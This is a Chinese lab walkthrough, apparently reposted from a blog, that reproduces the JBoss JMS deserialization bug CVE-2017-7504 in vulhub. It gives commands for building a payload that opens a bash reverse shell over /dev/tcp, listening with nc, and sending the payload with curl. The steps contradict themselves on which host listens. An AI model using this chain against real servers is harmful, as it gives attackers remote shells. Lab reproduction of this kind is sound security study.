(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞

Posted 番茄酱料

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞相关的知识,希望对你有一定的参考价值。

漏洞复现
复现环境:vulhub
1.打开环境
命令:docker-compose up -d

打开网址

靶机搭建完成(ip:10.0.78.22)
3.用kali作攻击机(ip:192.168.43.129)
下载序列化工具JavaDeserH2HC:https://github.com/ianxtianxt/CVE-2015-7501/
解压后将其拖进kali

4.执行命令
命令:javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

执行完后将会生成ExampleCommonsCollections1WithHashMap.class文件

5.继续执行命令
命令:java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “bash -i >& /dev/tcp/10.0.78.22/4444 0>&1”

执行完后将会生成ExampleCommonsCollections1WithHashMap.ser文件

6.在靶机上开启4444端口监听
命令:nc -lvp 4444

7.在攻击kali上将新生成的ser文件作为body发送数据包
命令:curl http://10.0.78.22:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

8.查看靶机是否反弹


成功反弹shell

以上是关于(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞的主要内容,如果未能解决你的问题,请参考以下文章

(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞

(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞

[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504

CVE-2017-7504CVE-2017-12149 JBOSS反序列化漏洞

jboss反序列化漏洞复现(CVE-2017-7504)

jboss 未授权访问漏洞复现